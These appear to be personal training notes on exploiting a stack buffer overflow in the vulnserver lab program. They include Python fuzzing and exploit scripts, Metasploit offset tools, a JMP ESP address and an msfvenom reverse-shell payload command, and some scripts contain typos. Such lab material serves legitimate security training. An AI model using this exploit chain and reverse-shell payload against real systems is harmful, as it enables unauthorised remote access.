Buffer Overflows

Requirements

Windows - OS (7-10) vulnserver Immunity Debugger

What is BoF?

Anatomy of memory:

  • Kernel

  • Stack

  • Heap

  • Data

  • Text

Overflowing the Buffer Space in stack and reach other levels allowing to control them

Steps of BoF

  1. Spiking

  2. Fuzzing

  3. Finding the offset (find the break point)

  4. Overwriting the EIP

  5. Finding bad characters

  6. Finding the Right Module

  7. Generating the shellcode

  8. Root <->

1. Spiking

Open vulnserver using the debugger to see what breaks and so on

  • From kali

Connect to {ip 9999} using nc Next up we put a bunch of characters to see if we can crash an app using a certain command. generic_send_tcp ^ send a TCP request with our characters and test it Now we create a file {something}.spk and put this in there:

s_readline();
s_string("STATS ");
s_string_variable("0");

STATS <- in this case, should be replaced with the command name to make it specific

Command to send the spike: generic_send_tcp {ip} {port} file.spk 0 0 TRUN command appears to be vulnerable

2. Fuzzing

TRUN is vulnerable so we can now attack it Python fuzzing script

#!/usr/bin/python
import sys, socket
from time import sleep
buffer = "A" * 100
while True:
    try:
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(('{IP}',{PORT}))

        s.send(('TRUN /.:/' + buffer))
        s.close()
        sleep(1)
        buffer = buffer + "A"*100
    except:
        print "Fuzzing crashed at %s bytes" % str(len(buffer))
        sys.exit

3. Finding the offset

Here we want to find the place which we override with the characters tool: /usr/share/metasploit-framework/exploit/pattern_create.rb Command used:

/usr/share/metasploit-framework/exploit/pattern_create.rb -l 3000 
# -l = length
# 3000 = in the last step we found that it took around 27k-30k characters to break the app

Copy the output -> modify the script by replacing offset with the characters and remove the while loop (offset is buffer in the old script) Script should look like this:

#!/usr/bin/python
import sys,socket
offset = "{output from pattern_create}"
try:
    s-socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(('{IP}',{PORT}))
    s.send(('TRUN /.:/' + offset))
    s.close()
except:
    print "Error connecting to the server"
    sys.exit()

In the debugger, we could see that 386F4337 appears to be vulnerable Now, let's try something more specific

/usr/share/metasploit-framework/exploit/pattern_offset.rb -l 3000 -q 386F4337

# -l = length
# 3000 = in the last step we found that it took around 27k-30k characters to break the app
# -q emphasizes the target

Output: 2003 <- We can start controlling the EIP with this amount. (Exactly what we wanted)

4. Overwriting the EIP

Editing the script

#!/usr/bin/python
import sys,socket

shellcode = "A" * 2003 + "B" * 4
# 2003 A - when we start overwriting the EIP

try:
    s-socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(('{IP}',{PORT}))
    s.send(('TRUN /.:/' + shellcode))
    s.close()
except:
    print "Error connecting to the server"
    sys.exit()

5. Finding Bad Characters

  • google "badchars" -> Bulbsecurity.com

  • Copy-paste the badchars variable

  • Add badchars to the script as a separate varible

  • Add + badchars to shellcode

Look at the debugger hex dump output If something is off - it's a bad character; Lack of bad characters is what we need

6. Finding the right module

Tool: github.com/corelan/mona Save that script to the machine at C:\ProgramFiles(x86)\ImmunityInc\ImmunityDebugger\PyCommands Type !mona modules in the ImmunityDebugger

In kali: /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb We want to convert Assembly code to Hex Type command JMP ESP -> take FFE4

Go back to immunity debugger and change !mona modules to !mona find -s "\xff\xe4" -m essfunc.dll

Modify the python script and remove badchars -> Change "B" *4 to "\xaf\x11\x50\x62"

7-8. Generating Shellcode and Getting Root

Tool: msfvenom Command: msfvenom -p windows/shell_reverse_tcp LHOST={OUR IP} LPORT={OUR PORT} EXITFUNC=thread -f c -a x86 -b "\x00"

Notes on the command:
# set the module = windows reverse tcp
# LHOST & LPORT = kali ip and port
# Exitfunc = for stability
# -b = bad characters (needs to be set or changed accordingly)

Copy and paste the output to our python code

  • Make it a separate varible and add to the shellcode + overflow

  • To be 100% sure, it's good to add + "\x90" * 32 before the `+overflow+

-> Set up nc listener -> Run the script

Additional: BoF templates

https://github.com/Swafox/OSCP/tree/master/exploit-development

Last updated